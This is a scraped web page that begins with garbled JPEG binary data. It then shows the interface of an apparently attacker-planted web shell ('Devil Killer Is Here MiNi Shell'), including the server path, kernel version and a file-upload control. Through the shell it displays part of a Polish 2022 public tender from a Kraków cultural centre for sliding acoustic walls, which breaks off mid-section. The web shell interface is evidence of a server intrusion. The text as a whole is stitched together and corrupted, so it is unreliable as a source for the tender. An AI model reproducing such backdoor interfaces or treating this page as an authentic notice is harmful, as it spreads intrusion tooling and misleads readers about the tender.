JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220513/0015809901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Wykonanie , dostawa i montaż ścian przesuwnych w Klubie WERSALIK </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ośrodek Kultury Kraków - Nowa Huta</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351001192</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">os. Zgody 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-949</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@krakownh.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://krakownh.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie , dostawa i montaż ścian przesuwnych w Klubie WERSALIK </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-08336dfd-d299-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00158099</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00005709/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa i montaż ścianek mobilnych w Klubie Wersalik</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.krakow.pl/?bip_id=466&amp;mmi=16636 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.bip.krakow.pl/?<br/>bip_id=466&amp;mmi=16636</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>niniejszym postępowaniu komunikacja odbywa się przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAPu https://obywatel.gov.pl/nforms/ezamowienia oraz poczty<br/>elektronicznej na adres: zamowienia@krakownh.pl<br/>2. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu, musi posiadać konto na ePUAP.<br/>3. Wykonawca składa tylko jedną ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania<br/>oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Wraz z<br/>formularzem należy złożyć pozostałe dokumenty wskazane w pkt 6.1.1. – 6.1.5. SWZ.<br/>UWAGA!<br/>Uwaga! Wykonawca winien zapoznać się z wytycznymi Urzędu Zamówień Publicznych<br/>udostępnionymi na https://www.uzp.gov.pl/strona-glowna/slideraktualnosci/<br/>jaknalezypodpisacofertewpostacielektronicznej/<br/>jak-nalezy-podpisac-oferte-w postaci-elektronicznej Zgodnie z ww.<br/>wytycznymi podpis składany wyłącznie na ww. „Formularzu do złożenia, zmiany, wycofania oferty lub<br/>wniosku” nie wywołuje skutków w odniesieniu do złożonej za jego pomocą oferty Wykonawcy. Oferta<br/>bowiem, zgodnie z art. 63 ustawy, a nie ww. formularz elektroniczny za pośrednictwem którego jest<br/>przekazywana, musi zostać opatrzona właściwym podpisem. W zakresie procedury podpisywania<br/>oferty odpowiednim podpisem, czyli składania właściwego podpisu pod ofertą złożoną w postaci<br/>elektronicznej wskazać należy, iż prawidłowym będzie złożenie oferty w ten sposób, że Wykonawca<br/>przekazuje Zamawiającemu zaszyfrowany plik zawierający ofertę opatrzoną właściwym podpisem lub<br/>plik oferty wraz z plikiem podpisu (w przypadku podpisu zewnętrznego), przy czym opatrzenie oferty<br/>podpisem nastąpiło przed zaszyfrowaniem oferty. Dopuszczalne jest również, aby Wykonawca<br/>przekazał Zamawiającemu swoją ofertę w tzw. „paczce” dokumentów elektronicznych (tj. w<br/>skompresowanym archiwum dokumentów elektronicznych, które najczęściej zapisane jest w formacie<br/>ZIP) wraz z właściwym podpisem dołączonym jako plik podpisu do paczki dokumentów<br/>elektronicznych przed jej zaszyfrowaniem, o czym wprost stanowi § 8 Rozporządzenia, o którym mowa w pkt 8.4. SWZ. Zatem podpis może zostać złożony bezpośrednio na pliku z ofertą Wykonawcy lub na „paczce” dokumentów elektronicznych zawierających ofertę Wykonawcy. Opatrzenie właściwym<br/>podpisem oferty (lub paczki) następuje przed czynnością jej zaszyfrowania. Złożenie podpisu jedynie<br/>na „Formularzu do złożenia, zmiany, wycofania oferty lub wniosku” nie jest równoznaczne ze<br/>złożeniem podpisu pod ofertą. Oferta, która została złożona bez opatrzenia właściwym podpisem<br/>elektronicznym podlega odrzuceniu na podstawie art. 226 ust. 1 pkt 3 ustawy z uwagi na niezgodność<br/>z art. 63 ustawy.<br/>4. Sposób złożenia oferty, w tym zaszyfrowania oferty, opisany został w „Instrukcji użytkownika<br/>systemu miniPortal oraz Regualminie ePUAP”.<br/>5. Identyfikator postępowania został wskazany w pkt 2. SWZ.<br/>6. W Formularzu Oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP oraz poczty<br/>elektronicznej poprzez które Zamawiający będzie komunikował się z Wykonawcą.<br/>7. Wykonawca może przed upływem terminu do składania ofert wycofać ofertę za pośrednictwem<br/>„Formularza do złożenia, zmiany, wycofania oferty lub wniosku”. Sposób wycofania oferty został<br/>opisany w „Instrukcji użytkownika systemu miniPortal-ePUAP”.<br/>8. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów, informacji i oświadczeń<br/>oraz ich cyfrowych odwzorowań (w tym tzw. kopii elektronicznych) opisane zostały w Regulaminie<br/>korzystania z miniPortalu oraz Regulaminie ePUAP<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do:<br/>„złożenia, zmiany, wycofania oferty lub wniosku” oraz „komunikacji” wynosi 150 MB, a plików<br/>przesyłanych za pośrednictwem poczty elektronicznej wynosi 40 MB.<br/>c.d. w Informacjach dodatkowych i w pkt 9 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Ośrodek Kultury Kraków-Nowa Huta z siedzibą przy os.<br/>Zgody 1 (31-949 Kraków), działając zgodnie z art. 13 ust. 1 i ust. 2 ogólnego rozporządzenia o<br/>ochronie danych osobowych z dnia 27 kwietnia 2016 roku (dalej: RODO) informuje, że:<br/>1) administratorem danych osobowych przekazanych przez Wykonawcę w ofercie i we wszelkich<br/>dokumentach składanych w postępowaniu o udzielenie niniejszego postępowania jest Zamawiający –<br/>Ośrodek Kultury Kraków-Nowa Huta, os. Zgody 1 w Krakowie,<br/>2) W Ośrodku Kultury Kraków-Nowa Huta został powołany Inspektor Ochrony Danych zgodnie z<br/>postanowieniami RODO, kontakt e-mail: rodo@krakownh.pl, z którym można się kontaktować w<br/>sprawach związanych z przetwarzaniem danych osobowych przez Administratora.<br/>3) Przetwarzanie danych, o których mowa w pkt 1) w celu związanym z niniejszym postępowaniem o<br/>udzielenie zamówienia publicznego następuje na podstawie z art. 6 ust. 1 lit. b i c Rozporządzenia,<br/>4) Odbiorcami danych osobowych będą osoby lub podmioty którym zostanie udostępniona<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Prawo zamówień publicznych.<br/>5) ww. dane osobowe będą przechowywane zgodnie z art. 78 ustawy Pzp przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia<br/>6) Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach<br/>ustawy pzp, konsekwencje niepodania danych wynikają z ustawy pzp.<br/>7) Wykonawcy mają prawo do żądania od Zamawiającego dostępu do swoich danych osobowych, ich<br/>sprostowania, ograniczenia przetwarzania.<br/>8) W związku z przetwarzaniem danych osobowych przez Administratora przysługuje prawo wniesienia<br/>skargi do organu nadzorczego.<br/>9) Nie przysługuje Pani/Panu:<br/>• w zw. z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>• prawo do przenoszenia danych osobowych o którym mowa w art. 20 RODO,<br/>• na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DA.261.1.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1.	Przedmiot zamówienia obejmuje wykonanie, dostawę i montaż ścian mobilnych w klubie WERSALIK os. Ogrodowe 15 w Krakowie, wg. rysunków (zał. nr 5 do SWZ) i poniższego opisu:<br/>System ścianek akustycznych w sali klubowej<br/>W sali 0.10 planuje się wprowadzenie trzech ścian działowych panelowych, przesuwnych, akustycznych z certyfikatem B1 (trudnopalnym) w kolorze ścian NCS S 1002 G50Y z panelami drzwiowymi z szynami montowanymi w istniejącym suficie podwieszanym. Minimalna izolacyjność akustyczna Rw, P = 53 dB zgodnie z normą akustyczną : PN-B-02151-3, minimalna siła docisku : 1500 N/m, płyta B1 (trudnopalna) – zgodnie z normą: PN-EN 13501-1, szyny chowane w suficie podwieszanym.<br/><br/>UWAGA: Zakres prac obejmuje poza dostawą i montażem ścian mobilnych, również: częściowy demontaż istniejącego sufitu podwieszanego wraz z izolacją (w miejscu montażu szyn), a po montażu ścian mobilnych uzupełnienie sufitu podwieszanego (wraz ze scaleniem kolorystycznym). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39150000-8 - Różne meble i wyposażenie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45421152-4 - Instalowanie ścianek działowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-09-08</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował kryterium<br/>najniższej ceny (60%) oraz długość okresu gwarancji (40%)<br/> 2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu. <br/>3. Oferta która otrzyma największą, łączną ilość punktów uznana zostanie za najkorzystniejszą.<br/>4. W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w<br/>uprzednio złożonych przez nich ofertach. 5. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych<br/>dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie<br/>wskazanym przez Zamawiającego. 6. Zamawiający̨ wybiera najkorzystniejsza ̨ ofertę ̨ w terminie<br/>związanią oferta ̨ określonyḿ w SWZ. 7. Jeżeli̇ termin związanią oferta ̨ upłynie przed wyborem<br/>najkorzystniejszej oferty, Zamawiający̨ wezwie Wykonawcę,̨ któregó oferta otrzymała najwyższą ̨<br/>ocenę,̨ do wyrażenia,̇ w wyznaczonym przez Zamawiającegǫ terminie, pisemnej zgody na wybóŕ jego oferty. 8. W przypadku braku zgody, o której́ mowa powyżej , oferta podlega odrzuceniu, a<br/>Zamawiający̨ zwraca się o wyrażeniė takiej zgody do kolejnego Wykonawcy, któregó oferta została<br/>najwyżej̇ oceniona, chyba zė zachodzą ̨ przesłanki do unieważnieniȧ postepowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 5.1.	W postępowaniu mogą wziąć udział Wykonawcy, którzy – zgodnie z art. 57 pkt 2 ustawy – spełniają warunki udziału w postępowaniu, tj. w zakresie posiadania zdolności technicznej lub zawodowej w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali co najmniej jedno zamówienie, którego przedmiotem była dostawa i montaż mobilnych ścian rozdzielających pomieszczenia, o wartości nie mniejszej niż 150 000 zł brutto <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o aktualności informacji zawartych w oświadczeniu/-ach, o którym/-ch mowa w pkt<br/>6.1.5.1. SWZ w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w<br/>pkt 5.2. SWZ odpowiednio:<br/>a) samego Wykonawcy lub każdego z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia,<br/>b) podmiotu/-ów, na którego/-ych zdolnościach technicznych lub zawodowych polega Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu – jeżeli dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">6.2.2.	Wykaz dostaw wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, wartości, dat wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, sporządzony wg wzoru stanowiącego załącznik nr 4 do SWZ, oraz z załączeniem dowodów określających, czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy, na potwierdzenie spełniania warunku posiadania doświadczenia, o którym mowa w pkt 5.1. SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz Oferty, według wzoru stanowiącego Zał. nr 1 do SWZ, wypełniony i podpisany<br/>przez osoby umocowane należycie do reprezentowania Wykonawcy. 2. Wraz z ofertą<br/>Wykonawca składa:1) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej<br/>Ewidencji Informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba że<br/>Wykonawca w Formularzu Oferty wskaże dane umożliwiające dostęp do tych dokumentów<br/>samodzielnie przez Zamawiającego, poprzez bezpłatne i ogólnodostępne bazy danych; 2)<br/>pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy, jeżeli w jego imieniu działa osoba, której umocowanie do reprezentowania nie<br/>wynika z dokumentów wymienionych w pkt 1) powyżej; Opisane powyżej zasady stosuje się<br/>odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o<br/>udzielenie niniejszego zamówienia oraz do osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby.3) Zobowiązanie podmiotu udostępniającego zasoby do oddania do<br/>dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia, lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów, jako dowód polegania na zdolnościach<br/>technicznych lub zawodowych tego podmiotu, w odniesieniu do warunków udziału w<br/>postępowaniu, o których mowa w pkt. 5.1. SWZ – jeżeli dotyczy4) Oświadczenie, z którego<br/>wynika, które usługi wykonają poszczególni Wykonawcy – przy czym obowiązek ten dotyczy<br/>wyłącznie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 117<br/>ust. 4 ustawy. 5) W celu wstępnego potwierdzenia, że Wykonawca nie podlega wykluczeniu<br/>oraz spełnia warunki udziału w postępowaniu, zgodnie z art. 125 ust. 1 i ust. 5 ustawy, składa on<br/>odrębne następujące oświadczenia: a) o niepodleganiu wykluczeniu z postępowania oraz b) o<br/>spełnianiu warunków udziału w postępowaniu, odpowiednio: i. samego Wykonawcy lub każdego<br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia; ii. podmiotu/-ów, na<br/>którego/-ych zdolnościach technicznych lub zawodowych polega Wykonawca w celu<br/>potwierdzenia spełniania warunków udziału w postępowaniu – jeżeli dotyczy, według wzorów<br/>zaproponowanych odpowiednio w formularzach A, B, C i D zał. nr 2 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 7.1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (np. członkowie<br/>konsorcjum, wspólnicy spółki cywilnej), zgodnie z art. 58 ust. 2 ustawy, są zobowiązani<br/>ustanowić Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich<br/>w postępowaniu i do zawarcia umowy, i przedstawić stosowne dokumenty (pełnomocnictwa) w<br/>składanej ofercie.<br/>7.2. Ponadto Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego<br/>składają:<br/>7.2.1. każdy z osobna dotyczące ich dokumenty wskazane odpowiednio w pkt 6.1.5.1., a<br/>ponadto – na wezwanie Zamawiającego – także dokument opisany w pkt 6.2.1 SWZ dot.<br/>każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7.2.2. jeżeli dotyczy - 